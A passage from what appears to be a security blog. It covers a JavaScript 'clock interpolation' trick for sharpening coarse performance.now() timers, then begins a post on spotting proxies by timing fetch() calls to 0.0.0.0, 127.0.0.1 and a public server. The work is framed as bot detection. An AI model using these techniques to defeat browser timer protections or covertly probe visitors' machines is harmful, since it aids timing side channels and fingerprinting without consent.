<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">next</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">count_edge</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">(),</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">count</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">sleep</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ms</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="nx">resolve</span> <span class="p">=></span> <span class="nx">setTimeout</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">ms</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">measure</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="c1">// some heavy math that takes some time</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">k</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">k</span> <span class="o"><</span> <span class="mf">1000000</span><span class="p">;</span> <span class="nx">k</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">q</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">log10</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">pow</span><span class="p">(</span><span class="nx">k</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">atan2</span><span class="p">(</span><span class="nx">k</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">k</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">)</span> <span class="o">-</span> <span class="nx">count</span> <span class="o">*</span> <span class="nx">calibrate</span><span class="p">();</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Count (Left in ongoing Edge): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Original Timing: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">));</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Improved Timing: '</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">measurePrecision</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// The performance.now() method returns a DOMHighResTimeStamp, measured in milliseconds.</span>
<span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">());</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">diff1</span> <span class="o">=</span> <span class="nx">t1</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">diff2</span> <span class="o">=</span> <span class="nx">samples</span><span class="p">[</span><span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">samples</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'#1 Elapsed measured by performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'#2 Elapsed measured by collected samples: '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Number of samples: '</span> <span class="o">+</span> <span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="p">);</span>
<span class="kd">let</span> <span class="nx">s</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">(</span><span class="nx">samples</span><span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Number of unique samples / measuring steps: '</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Granularity/Precision #1 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Granularity/Precision #2 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">''</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">measurePrecision</span><span class="p">();</span>
<span class="nx">setTimeout</span><span class="p">(</span><span class="nx">measure</span><span class="p">,</span> <span class="mf">1000</span><span class="p">);</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>To be honest, I have some issues with their proposed calibration function:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">calibrate</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">,</span> <span class="nx">next</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="nx">counter</span> <span class="o">+=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="p">}</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="nx">counter</span> <span class="o">/</span> <span class="mf">10.0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>As I have shown above, there is no clear correlation between <code>performance.now()</code> gap size and the
counter steps. In the function <code>calibrate()</code> they collect the edge size in counter steps for 10 samples and then they calibrate by</p>
<div class="highlight"><pre><span></span><code><span class="k">return</span> <span class="p">(</span><span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="nx">counter</span> <span class="o">/</span> <span class="mf">10.0</span><span class="p">);</span>
</code></pre></div>
<p>by dividing the size of one edge in terms of <code>performance.now()</code> millieseconds by the average edge size in terms of counter values (N=10).</p>
<p>I have some issues with that approach:</p>
<ol>
<li>It seems to me that the <code>counter</code> value for each <code>performance.now()</code> step is rather unpredictable. It's probably dependent on page load, JavaScript execution, overall processor load and so on.</li>
<li>We invoke <code>calibrate()</code> after the function that we want to time? Who says that suddenly there is less load on JavaScript and we obtain larger counter values than during function execution?</li>
</ol>
<p>But still, I think clock interpolation gives us better resolution than <code>performance.now()</code>.</p>
<p>What do we gain in resolution?</p>
<p>This is how a function with clock interpolation is measured:</p>
<div class="highlight"><pre><span></span><code><span class="k">async</span> <span class="kd">function</span> <span class="nx">measure</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="c1">// some heavy math that takes some time</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">k</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">k</span> <span class="o"><</span> <span class="mf">10000000</span><span class="p">;</span> <span class="nx">k</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">q</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">log10</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">pow</span><span class="p">(</span><span class="nx">k</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">atan2</span><span class="p">(</span><span class="nx">k</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">k</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">)</span> <span class="o">-</span> <span class="nx">count</span> <span class="o">*</span> <span class="nx">calibrate</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Count (Left in ongoing Edge): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Original Timing: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Improved Timing: '</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>So the idea is actually the following:</p>
<p>The execution time of the function is measured with the variabales <code>start</code> and <code>t1</code>. Both are variables populated from <code>performance.now()</code>.</p>
<p>However, before the <code>t1</code> measurement is taken, it has to be waited until a new edge is reached (<code>var count = count_edge();</code>). We are now right at the start of a new edge. <code>count</code> holds the number of increments that were left in the ongoing edge.</p>
<p>Then the elapsed time <code>t1 - start</code> is decreased by <code>count * calibrate()</code>.</p>
<p>Multiplying <code>calibrate()</code> with <code>count</code> basically translates <code>count</code> into millieseconds, and this amount of millieseconds can be subtracted from the elapsed time to obtain a higher resolution timestamp.</p>
<h3>Clock interpolation on different OS' and machines</h3>
<p>I am using browserstack to conduct my experiments. I am using real devices to visit my <a href="https://bot.incolumitas.com/timers/calibrate.html">Live Page of Clock Interpolation</a>.</p>
<h4>Win 11 with Chrome 97</h4>
<figure>
<img src="https://incolumitas.com/images/windows11-chrome-97.png" alt="timing" />
<figcaption>Win 11 with Chrome 97</figcaption>
</figure>
<h4>Win 11 with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/windows11-ff-95.png" alt="timing" />
<figcaption>Win 11 with Firefox 95</figcaption>
</figure>
<h4>Win 10 with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/windows10-ff-95.png" alt="timing" />
<figcaption>Win 10 with Firefox 95</figcaption>
</figure>
<h4>macOS Montery with Chrome 97</h4>
<figure>
<img src="https://incolumitas.com/images/montery-chrome-97.png" alt="timing" />
<figcaption>macOS Montery with Chrome 97</figcaption>
</figure>
<h4>macOS Montery with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/montery-ff-95.png" alt="timing" />
<figcaption>macOS Montery with Firefox 95</figcaption>
</figure>Is this a valid method to detect Proxies?2021-11-26T18:46:00+01:002021-11-27T18:46:00+01:00Nikolai Tschachertag:incolumitas.com,2021-11-26:/2021/11/26/is-this-a-valid-method-to-detect-proxies/<p>I (maybe) found another method to detect browsers that route their traffic through SOCKS/HTTP proxies. What do you think? Is this a valid method to detect Proxies? I need your help!</p><p><strong>Please Note:</strong> I was quite hesitant to publish this article, because I don't know exactly how this proxy detection method works (if it works). I need your help to review this, please leave a comment if you know more.</p>
<p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Also visit my Proxy/VPN Detection Page
</a></p>
<h2>Introduction</h2>
<p>The goal of this article is to reliably detect proxies using JavaScript (More accurate: By measuring latencies with JavaScript). There are many legitimate reasons for proxy usage, but unfortunately, criminals tend to also camouflage their Internet identity (IP address) by abusing proxies.</p>
<p>I hate to do deal with latencies and to derive conclusions while looking at them. It's improper science and it's quite dirty to be frank. But I fear that there is some truth hidden in latencies and that it must be considered when trying to detect sneaky bots and malicious traffic.</p>
<p>Let's put it that way: Have you ever attempted to browse a website with a proxy? Have you noticed that everything tends to load a bit slower? Probably!</p>
<p>Why should it be impossible to detect this delay and slowness using JavaScript? After all, JavaScript gives us a full programming language with (almost) limitless possibilities!</p>
<p>Looking at latencies is just another side channel attack that JavaScript gives us. There are almost limitless possibilities when each website is given the permission to execute arbitrary (sandboxed) code on client machines.</p>
<figure>
<img src="https://incolumitas.com/images/1024px-Mad_scientist.png" alt="Mad Scientist" width="683px" heigh="639px" />
<figcaption>Me trying to detect proxies with latencies
<span style="font-size: 70%">(Source: <a href="https://de.wikipedia.org/wiki/Verr%C3%BCckter_Wissenschaftler#/media/Datei:Mad_scientist.svg">https://de.wikipedia.org/wiki/Verr%C3%BCckter_Wissenschaftler#/media/Datei:Mad_scientist.svg</a>)</span>
</figcaption>
</figure>
<p>What do I even mean when I speak of <strong>detecting proxies with latency measurements</strong>?</p>
<p>There are essentially two ways how bots use proxies in the real world:</p>
<ol>
<li>They make use of the SOCKS protocol. SOCKS5, the latest version of the protocol is defined in <a href="https://datatracker.ietf.org/doc/html/rfc1928">RFC 1928</a>. This RFC is from March 1996, so it's seen quite some days. SOCKS allows you to route any connection, either UDP or TCP, through a proxy server.</li>
<li>Then there are HTTP Proxies, implemented with the CONNECT http method. This behavior is specified in <a href="https://httpwg.org/specs/rfc7231.html#CONNECT">RFC 7231, 4.3.6. CONNECT</a>.</li>
</ol>
<p>For <a href="https://datatracker.ietf.org/doc/html/rfc1928">RFC 1928</a>, the most important part is:</p>
<blockquote>
<p>When a TCP-based client wishes to establish a connection to an object
that is reachable only via a firewall (such determination is left up
to the implementation), it must open a TCP connection to the
appropriate SOCKS port on the SOCKS server system. The SOCKS service
is conventionally located on TCP port 1080. If the connection
request succeeds, the client enters a negotiation for the authentication method to be used, authenticates with the chosen method, then sends a relay request. The SOCKS server evaluates the
request, and either establishes the appropriate connection or denies
it.</p>
</blockquote>
<p>As you can read above, the SOCKS specification states
that a SOCKS server basically has to glue two TCP streams
together (<em>"sends a relay request"</em>).</p>
<p>For HTTP proxies, the most important part from <a href="https://httpwg.org/specs/rfc7231.html#CONNECT">RFC 7231, 4.3.6. CONNECT</a> reads:</p>
<blockquote>
<p>The CONNECT method requests that the recipient establish a tunnel to the destination origin server identified by the request-target and, if successful, thereafter restrict its behavior to blind forwarding of packets, in both directions, until the tunnel is closed. Tunnels are commonly used to create an end-to-end virtual connection, through one or more proxies, which can then be secured using TLS (Transport Layer Security, [RFC5246]).</p>
</blockquote>
<p><strong>My conclusion:</strong> Each TCP/IP stream, especially the connection establishment, costs several RTT's and thus time. A packet being transmitted through two interconnected TCP/IP streams from host A to host B takes more time than a packet flowing through just one TCP channel from host A to host B.</p>
<h2>The Idea</h2>
<p>The idea I had is quite simple:</p>
<p>I want to measure the RTT/network latency to three different IP addresses:</p>
<ol>
<li>The non-routable meta-address <code>0.0.0.0</code></li>
<li>The IPv4 loopback address <code>127.0.0.1</code></li>
<li>Differential public IP address: An Internet reachable server with IP address for example <code>167.99.241.135</code></li>
</ol>
<p>The port does not matter here. I chose an arbitrary port that is closed with high confidence. Of course we cannot be sure that the port is closed, but the likelihood of a service listening on <code>127.0.0.1:43983</code> is rather small.</p>
<p><strong>Conjecture:</strong></p>
<p>If the latency measured with JavaScript to the address <code>0.0.0.0</code> is significantly larger compared to the latency to
<code>127.0.0.1</code>, there might be a proxy used by the browser. </p>
<p>Additionally, the latency to <code>0.0.0.0</code> compared to the latency to <code>167.99.241.135</code> must be in the same range. Otherwise, the collected data is likely invalid.</p>
<h3>Explanation</h3>
<p>But why should the latency to <code>0.0.0.0</code> be significantly larger than the latency to <code>127.0.0.1</code> when we use a proxy?</p>
<p>Honestly, I don't know for sure (!).</p>
<p>According to this <a href="https://news.ycombinator.com/item?id=9048811">hacker news thread</a>, the IP <code>0.0.0.0</code> should not point to localhost when entered in the Chromium address bar. But in this <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=428046">Chromium bug tracker discussion</a>, this is exactly what it does: </p>
<blockquote>
<p>Allow explicit navigations to "0.0.0.0" to support systems where this performs a
navigation to localhost (in defiance of specs... but seemingly common).</p>
</blockquote>
<p>We can quickly look into the <a href="https://chromium.googlesource.com/chromium/src/+/65e7a0403eb51c8490ee13e5da3ed8e544c34926/components/omnibox/autocomplete_input.cc">Google Chrome code base autocomplete_input.cc</a> where autocomplete in the Chromium address bar is handled:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/* components/omnibox/autocomplete_input.cc */</span><span class="w"></span>
<span class="c1">// For hostnames that look like IP addresses, distinguish between IPv6</span>
<span class="c1">// addresses, which are basically guaranteed to be navigations, and IPv4</span>
<span class="c1">// addresses, which are much fuzzier.</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV6</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">metrics</span><span class="o">::</span><span class="n">OmniboxInputType</span><span class="o">::</span><span class="n">URL</span><span class="p">;</span><span class="w"></span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// The host may be a real IP address, or something that looks a bit like it</span>
<span class="w"> </span><span class="c1">// (e.g. "1.2" or "3232235521"). We check whether it was convertible to an</span>
<span class="w"> </span><span class="c1">// IP with a non-zero first octet; IPs with first octet zero are "source</span>
<span class="w"> </span><span class="c1">// IPs" and are almost never navigable as destination addresses.</span>
<span class="w"> </span><span class="c1">//</span>
<span class="w"> </span><span class="c1">// The one exception to this is 0.0.0.0; on many systems, attempting to</span>
<span class="w"> </span><span class="c1">// navigate to this IP actually navigates to localhost. To support this</span>
<span class="w"> </span><span class="c1">// case, when the converted IP is 0.0.0.0, we go ahead and run the "did the</span>
<span class="w"> </span><span class="c1">// user actually type four components" test in the conditional below, so</span>
<span class="w"> </span><span class="c1">// that we'll allow explicit attempts to navigate to "0.0.0.0". If the</span>
<span class="w"> </span><span class="c1">// input was anything else (e.g. "0"), we'll fall through to returning QUERY</span>
<span class="w"> </span><span class="c1">// afterwards.</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">||</span><span class="w"></span>
<span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// This is theoretically a navigable IP. We have four cases. The first</span>
<span class="w"> </span><span class="c1">// three are:</span>
<span class="w"> </span><span class="c1">// * If the user typed four distinct components, this is an IP for sure.</span>
<span class="w"> </span><span class="c1">// * If the user typed two or three components, this is almost certainly a</span>
<span class="w"> </span><span class="c1">// query, especially for two components (as in "13.5/7.25"), but we'll</span>
<span class="w"> </span><span class="c1">// allow navigation for an explicit scheme or trailing slash below.</span>
<span class="w"> </span><span class="c1">// * If the user typed one component, this is likely a query, but could be</span>
<span class="w"> </span><span class="c1">// a non-dotted-quad version of an IP address.</span>
<span class="w"> </span><span class="c1">// Unfortunately, since we called CanonicalizeHost() on the</span>
<span class="w"> </span><span class="c1">// already-canonicalized host, all of these cases will have been changed</span>
<span class="w"> </span><span class="c1">// to have four components (e.g. 13.2 -> 13.0.0.2), so we have to call</span>
<span class="w"> </span><span class="c1">// CanonicalizeHost() again, this time on the original input, so that we</span>
<span class="w"> </span><span class="c1">// can get the correct number of IP components.</span>
<span class="w"> </span><span class="c1">//</span>
<span class="w"> </span><span class="c1">// The fourth case is that the user typed something ambiguous like ".1.2"</span>
<span class="w"> </span><span class="c1">// that fixup converted to an IP address ("1.0.0.2"). In this case the</span>
<span class="w"> </span><span class="c1">// call to CanonicalizeHost() will return NEUTRAL here. Since it's not</span>
<span class="w"> </span><span class="c1">// clear what the user intended, we fall back to our other heuristics.</span>
<span class="w"> </span><span class="n">net</span><span class="o">::</span><span class="n">CanonicalizeHost</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">UTF16ToUTF8</span><span class="p">(</span><span class="n">original_host</span><span class="p">),</span><span class="w"> </span><span class="o">&</span><span class="n">host_info</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV4</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">num_ipv4_components</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">4</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">metrics</span><span class="o">::</span><span class="n">OmniboxInputType</span><span class="o">::</span><span class="n">URL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The important part from the comment reads:</p>
<blockquote>
<p>The one exception to this is 0.0.0.0; on many systems, attempting to navigate to this IP actually navigates to localhost.</p>
</blockquote>
<p>According to <a href="https://en.wikipedia.org/wiki/0.0.0.0">Wikipedia</a>, the address <code>0.0.0.0</code> has a special meaning in routing contexts:</p>
<blockquote>
<p>In the context of routing tables, a network destination of 0.0.0.0 is used with a network mask of 0 to depict the default route as a destination subnet. This destination is expressed as 0.0.0.0/0 in CIDR notation. It matches all addresses in the IPv4 address space and is present on most hosts, directed towards a local router.</p>
</blockquote>
<p>Maybe when Chrome uses a proxy server, it will route requests going to <code>0.0.0.0</code> through the proxy server, but requests going to <code>127.0.0.1</code> not. This discrepancy could be measurable. Could this be correct? I DON'T KNOW.</p>
<h2>Experimental Setup</h2>
<p>In order to take latency measurements, I used the following JavaScript code (using <code>fetch()</code>):</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">measureImageLatenciesFetch</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">5</span><span class="p">;</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">ts</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">fullUrl</span> <span class="o">=</span> <span class="nx">url</span> <span class="o">+</span> <span class="p">(</span><span class="mf">44435</span> <span class="o">+</span> <span class="nx">i</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span> <span class="o">+</span> <span class="s1">'.png'</span><span class="p">;</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">fullUrl</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">((</span><span class="nx">err</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">ts</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span> <span class="nx">N</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">ts</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">})();</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">url</span> <span class="k">of</span> <span class="p">[</span><span class="s1">'https://0.0.0.0:'</span><span class="p">,</span> <span class="s1">'https://127.0.0.1:'</span><span class="p">,</span> <span class="s1">'https://167.99.241.135:'</span><span class="p">])</span> <span class="p">{</span>
